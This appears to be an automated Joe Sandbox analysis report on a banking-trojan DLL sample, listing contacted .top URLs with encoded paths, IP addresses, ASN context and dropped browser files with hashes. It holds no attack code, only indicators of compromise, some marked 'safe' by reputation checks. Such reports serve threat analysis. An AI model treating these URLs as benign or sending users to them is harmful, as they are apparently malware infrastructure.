http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	OgQJzDbLce.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.13.dr	false		high
http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp	~DFD4CA446EF33C2D57.TMP.20.dr, {77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat.20.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	OgQJzDbLce.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/p	loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	OgQJzDbLce.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.youtube.com/	msapplication.xml7.13.dr	false		high
https://sectigo.com/CPS0D	OgQJzDbLce.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wikipedia.com/	msapplication.xml6.13.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.13.dr	false		high
http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC	loaddll32.exe, 00000000.00000002.1018085048.0000000001697000.00000004.00000020.sdmp, ~DF4EBD4894B35EDD90.TMP.25.dr, {9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat.25.dr	false	Avira URL Cloud: safe	unknown
http://www.live.com/	msapplication.xml2.13.dr	false		high
http://www.reddit.com/	msapplication.xml4.13.dr	false		high
http://www.twitter.com/	msapplication.xml5.13.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.56.255.166	unknown	Romania		213137	INFOCLOUD-SRLMD	false
92.38.132.181	unknown	Austria		199524	GCOREAT	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338189
Start date:	11.01.2021
Start time:	19:16:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	OgQJzDbLce.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.bank.troj.winDLL@13/44@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.1% (good quality ratio 90.2%) Quality average: 78.5% Quality standard deviation: 29%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 52.255.188.83, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 51.11.168.160, 88.221.62.148, 152.199.19.161 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, updates.microsoft.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
INFOCLOUD-SRLMD	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	193.56.255.167
GCOREAT	8WLxD8uxRN.exe	Get hash	malicious	Browse	5.188.6.146
	https://kiankaziataad.com/shop/images/homebanners/err	Get hash	malicious	Browse	185.105.3.162
	LmlSW3qU2x.exe	Get hash	malicious	Browse	92.223.105.117
	https://sleekearflap.com//shareform/index.php	Get hash	malicious	Browse	92.38.163.8
	https://www.google.com/url?q=https://canadian-pills-store.su/?cp%3Dsalesx&sa=D&ust=1608032187237000&usg=AOvVaw2CTXjcE4npPvhIiuTL-Itl	Get hash	malicious	Browse	5.188.0.147
	https://ofd.beeline.ru/check-order/oxjsoinmq	Get hash	malicious	Browse	92.223.97.97
	https://www.wunba.com/	Get hash	malicious	Browse	92.223.97.97
	https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.html	Get hash	malicious	Browse	92.223.97.97
	mXlHxlkrkB.exe	Get hash	malicious	Browse	146.185.219.29
	Rawan inquiry.doc	Get hash	malicious	Browse	92.223.93.172
	5e3Dtdp1dU.exe	Get hash	malicious	Browse	185.101.139.252
	KqVNXoOE85.exe	Get hash	malicious	Browse	45.135.229.212
	xl.png.exe	Get hash	malicious	Browse	5.188.38.80
	corp-fin.xlsb	Get hash	malicious	Browse	5.188.38.80
	Ghj736i4Ht.exe	Get hash	malicious	Browse	185.105.1.149
	slip copy.exe	Get hash	malicious	Browse	45.135.229.212
	Receipt+00034587583883.exe	Get hash	malicious	Browse	92.223.105.174
	Angebot_09082020_148.xls	Get hash	malicious	Browse	5.188.0.171
	INV15 .docm	Get hash	malicious	Browse	92.38.135.61
	Tagesprotokoll_G0001_20200911.xlsm	Get hash	malicious	Browse	5.188.0.251

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5E3D54B5-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7677795101409812
Encrypted:	false
SSDEEP:	48:IwchGcpru6GwpL0TG/ap8SXrGIpcdGvnZpvpGo/Pqp9AGo4LlzpmBGW/5zTUCGWP:roZfZs2y9W6tVifDLlzML94O6vZBX2pB
MD5:	F19EB8802FE83029B13BCFB8D2C6C307
SHA1:	0D661CEF7AAD0B1567866B0C476D9256F1164241
SHA-256:	E5EFDD1A001C6136C17563097E5018D0AF6407B53B9E82E29220228A345A7010
SHA-512:	54E35057744434433BF64ED4DB17BB0C2185B5DAE63E55F4E21BBC52369BB6C7626F7B3320E315307B337B3F479DD7355A7DFD7E0A4651A9C515E1B5B1FF8646
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{77F8D090-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7727430226053469
Encrypted:	false
SSDEEP:	96:r/ZQZgV2gRO9WgRPztgRPA8ifgRPA2zeszMgRPCU2VEeN68gBgR2CU2hDpB:r/ZQZ62d9WOtWifmeszMrEG68gBSDpB
MD5:	83E4BBBE72AD06F58B5B436C654DD4F9
SHA1:	D9E6660D3F2750BC06D3399A9A74EF5F0B9E6D5A
SHA-256:	80F10776BF6323447A2448168B3BB752ECB5E0DA4DC2300F61B1F239B51871AB
SHA-512:	CB1ADE72BCFDBF4950BDF392CD62E539A695B7FD4A310946179AF67E220A9592AEF70E42F96BE7251915F378B1DC813E1CC66E5B61DE29AFA52A2791FE13EE63
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8DCAF18E-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.767609996176377
Encrypted:	false
SSDEEP:	192:rHZtZo2y9W4mt4Uif4cVrzM4XDp6j3BLEpB:r5D/yUBamrM
MD5:	40625874579526CBE836AA9E298C4BCC
SHA1:	72242BC794C34E86D9F6D273F42D393ECC5AFE68
SHA-256:	4E1165C23BD8EE6B5EB26D8C9D4E14D8E2AE86A672A0467522A735A13C1EB8E5
SHA-512:	EABE9A27C1F0FD2EC0FCCFFD46248C7D609E096CBB10EE34FEE2183DE53E1CA53E40FF09287BE6D5A9DC258EB957B533896720555CB5EB8B4029D8CB6E47D97A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9B722637-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7689336572294374
Encrypted:	false
SSDEEP:	48:IwcGcprJGwpLL6G/ap8LmrGIpcLGGvnZpvL7GolPqp9LGGo4h/zpmLxGWl5ZT+GP:rAZjZ0269WXtVifdh/zM9Ho6NzBIgpB
MD5:	26964069B5AB1183C6F019622544C827
SHA1:	2F4BA0A68FF90B1FF1AC3AA69DCCC64BEFFA7E66
SHA-256:	66F84454F3368C4080EDF55E3EE6CD0E7DE2A6F568CD156F02B2D13615716C5B
SHA-512:	C12F1922535948BA26B21EA9C5ED9246C869EC684A30561C62DB2AB485501F0F2FDBE202AEB1880CAC42BCC9996513F3EBB66EA4E0B4C845CB2976D7F623BF85
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E3D54B7-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8430070309605113
Encrypted:	false
SSDEEP:	96:r4ZLQt6DBSIFjZ2QkWBMwYiy6R9xy6RWWciA:r4ZLQt6DkIFjZ2QkWBMwYiyOxy/iA
MD5:	513141E5326F0E8893D18F6B6CF4ECC9
SHA1:	34E8DB4E1CA1B189129034CCFFC2F89D28B1141B
SHA-256:	33863CF59E31800B4A818618BF56BF1E408310CF474B079583065CE3268F8168
SHA-512:	1D4C9751793F1B566192A614E9265CF2B017C4B511024244862260619F861FC1A1C30BBAA6EB0EDA9369B6DFF3608C93FDEE07294F4A9D58C6531614D0538DD3
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27360
Entropy (8bit):	1.841214254937248
Encrypted:	false
SSDEEP:	192:r4ZfQ761k7FjV24kWXeMISYqxboZRxbo6b2KA:r4Y++7hM8X3ISfxbuxbBb2t
MD5:	EFC9DBE9B1A00BC2B3183437EABF9EA3
SHA1:	0012ACD6D98242CF5187119CE7514975FB2FF588
SHA-256:	16D2B449F031BFFECEB7AD22C8367515B1D83DD80DC95ABFAA8B94A500B63937
SHA-512:	6F43DFFC3E0AF0B68CD13E0D7A5C70FD8F895AED60D6D46CF88DF6C47202138CF2BA3F7A6912FF8B938CC8F915F8B4162D52CFCCACA7AF10972D3920A87A85A8
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8DCAF190-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.8472568777610467
Encrypted:	false
SSDEEP:	192:rqZBQt6Hk1Fjh2TkWoMHY6ewpJxewp56A:rWWYE1hQ3NHvewpXewp59
MD5:	D33C7184E23B721DCFC9E112AACACDC0
SHA1:	83E519B4B762340A3C01618B9C6BB15F6E926E4D
SHA-256:	B1F97C3D3BA1233DA5EE5D52FEB6378519CE2320E648C38746CC13A6F95C392D
SHA-512:	1CBD446F3DA475E2213B965C121EE73B03FBC9AA05B725B085C2B2526DD78743F9BBAEFFAA65E657F3EB04DE901D4AF14B4E9AC3BBBB78C2D467FC63871763EE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8403358832338321
Encrypted:	false
SSDEEP:	192:r9ZmQC6QkiFjp2jkWwMPYin4Ozxn4Oc8iA:rTztdih4HFPH4O4qV
MD5:	34D74AFEC96FDAF1AC3EC81B56E035A4
SHA1:	1D41B818ADAA1D9D1F974EEB0CD963D4921E0334
SHA-256:	FDD9D1EB2FA4628FC123AF5515F053BF4F6A5296C657D783509809CC4C1BB814
SHA-512:	DC4199F013F4A0C4B7085D38DC5919CB85276FE80BF7FF435445C84E62980AE6F9CAE8BCB686FF163C983FF2146A7B0FFF59E8F848E87E9BA4A9DA53D6B8EB04
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.123118361083354
Encrypted:	false
SSDEEP:	12:TMHdNMNxOECDr8nWimI002EtM3MHdNMNxOECDr8nWimI00OYGVbkEtMb:2d6NxORDr8SZHKd6NxORDr8SZ7YLb
MD5:	7E6B49EEC0BEB1BC27E4DED68249CE03
SHA1:	66533E523D676017CA1AC096F01B45EFC432D5B3
SHA-256:	92AB2E98CCA3A2E4DBFEFD4A84B850B7F9E47391B88B5FB2329DA36A5C82BEB6
SHA-512:	0DE3346DC82FB930C4A0F4D4E293003CB914F8CD9D8CBAD5F98FBCC0E20B9974DEEDB6EACFFE3A2857BF17609F3585FF8EB8BF6DF7346D0E2BFCB77E794C03CD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.11901366828337
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kDfcDqfc8nWimI002EtM3MHdNMNxe2kDfcDqfc8nWimI00OYGkak6t:2d6NxrLDd8SZHKd6NxrLDd8SZ7Yza7b
MD5:	CF6C928DA3DBC3459C96F4CC79D40C92
SHA1:	9A12BC347C3F0BEDA3725FD6DD42DD4DEF73FE5C
SHA-256:	26AF633EFA78F94B59A2ED6E838C1A29D982D1D13B04410B6FBDDAC187EEB7ED
SHA-512:	C4A20F0013DBACDD1D09DCF593CA1C4F312402077B881317384D27744043C0B7D8B93BE6221DB6C11FB97FD7B4ABFEE32365F08E821F1132BBE28FE8035AAB26
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x33a132c6,0x01d6e846</date><accdate>0x33a132c6,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x33a132c6,0x01d6e846</date><accdate>0x33a132c6,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.142286717418112
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLCDr8nWimI002EtM3MHdNMNxvLCDr8nWimI00OYGmZEtMb:2d6Nxv2Dr8SZHKd6Nxv2Dr8SZ7Yjb
MD5:	8AA7C1AE009F7157E9C6CEA1B4FE8BB3
SHA1:	CCD372C471932E57785792BB622A12D4842AEF90
SHA-256:	41F1F5F4B50D4CAF46FC5B1E2C086FA7A8D189CD3A77F958F1DB30E966F22541
SHA-512:	865D8552587DABD0550923067AC8CF21F0302C61E522F6158E45F496F10FD3104C4BCF5D8EB69B61FD29DCBAC00EF49A0B7BB35AB32E24433F54C54942A84CCB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.132012535046788
Encrypted:	false
SSDEEP:	12:TMHdNMNxiqVVDXVV8nWimI002EtM3MHdNMNxiqVVDXVV8nWimI00OYGd5EtMb:2d6NxDLDXL8SZHKd6NxDLDXL8SZ7YEjb
MD5:	95C939A865C8101F80CEDC1DE98A4361
SHA1:	BDEC37EE7FE60CAABE53594F681A3A0FB54E570E
SHA-256:	A825DE7F2D3734780282ECAD82F28538A9F0F12E974EBE63A5E3F9B699C4FBEB
SHA-512:	A478801B40A0AA5B391BC6607390AF931EC2BC11CC6AA7480799282A76FA9D4B545EBE2C87D79DCE8290E7B4FF7A59D75625B8E5EB438C91478C1C4669EE80FC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.157419814247615
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwCDr8nWimI002EtM3MHdNMNxhGwCDr8nWimI00OYG8K075EtMb:2d6NxQdDr8SZHKd6NxQdDr8SZ7YrKajb
MD5:	8930BB5A619E764D208825B40ADB9C1B
SHA1:	4BEB28A7403DD7AE4AA4E2716423295C92B1AA85
SHA-256:	603EBB0035DEB07CAE4A5C1047A0497858413F8F8DBEE33B1538DC93AB5A7FD0
SHA-512:	80A1313C37CF49532395952CD44C20431C28476EB822FAE565A06E6133CA888D5D1497D95551B2D6778AE00B4AA1B9D4F5BF6A0A30F99F0E895856914D707B30
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.120104889948707
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nqVVDXVV8nWimI002EtM3MHdNMNx0nqVVDXVV8nWimI00OYGxEtMb:2d6Nx0qLDXL8SZHKd6Nx0qLDXL8SZ7Yu
MD5:	900F7E70BF1A18DEF2B8F775034AD5C0
SHA1:	16A95BB43A7CC44A2D1CC3A7C658A7EE87BF59A7
SHA-256:	33BB8311F998AB5963614127CFCD20CB4FB815F895717981136AFEAD57B0E081
SHA-512:	A013E2F164B9567401D259EFE4B91EA555B4B6A154B948819A0BBE75CFD315722FABC2BBEBF8B6AC0FE59A6927745CFE17764D9E6270879DBC72C2F1874847D9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.155875441719391
Encrypted:	false
SSDEEP:	12:TMHdNMNxxqVVDXVV8nWimI002EtM3MHdNMNxxqVVDXVV8nWimI00OYG6Kq5EtMb:2d6NxILDXL8SZHKd6NxILDXL8SZ7Yhb
MD5:	94DEE2D982F6B090513529E3C081F2BB
SHA1:	A2AB3F04ED9CCC98B45D647F164CF17068C330E6
SHA-256:	B8F299722A651BFB5B335B51ED6C0843010CE50707E8E0EA256A5DA4CBDBD0EA
SHA-512:	911E6624B3FDFD109BB9C89EC2A6572FCF1C5A110D9484D05A2626E93CFCC59AFE868B3E6A37FB65F8CDE780D7772B0035E1F6C2CDE7CE63BB107E4D296624F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.104813971265666
Encrypted:	false
SSDEEP:	12:TMHdNMNxcvRfDKRf8nWimI002EtM3MHdNMNxcvRfDKRf8nWimI00OYGVEtMb:2d6NxIRfDKRf8SZHKd6NxIRfDKRf8SZ9
MD5:	C8FD4280CD70F937103A9AF732E3DD4E
SHA1:	A374A611046247FF1857B101DB71DC443824FA19
SHA-256:	8B141F38B3ACF2D58766274C0133B878ECEA2EDBC4B78F057A441EBD2E3E903F
SHA-512:	A50A5D49DC8A11B9A121E7B66BE8FC3C0115D56105B81EEE85DA791D4F11CB8E8D293AA216ADFC6147E3FB76E8D532358760E15A6E520BB537E08066D8DC7615
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.100792594048622
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnvRfDKRf8nWimI002EtM3MHdNMNxfnvRfDXVV8nWimI00OYGe5EtMb:2d6NxXRfDKRf8SZHKd6NxXRfDXL8SZ7Q
MD5:	7A0858FCBFC03AA1DBCCFF36133AD9DB
SHA1:	034E9AB92DB4EEE559E84C9760F470954D3A4422
SHA-256:	EC63AB7411D857A0AA038EF4D700252C5F7839DF80B2B5E5AB931486E21690FF
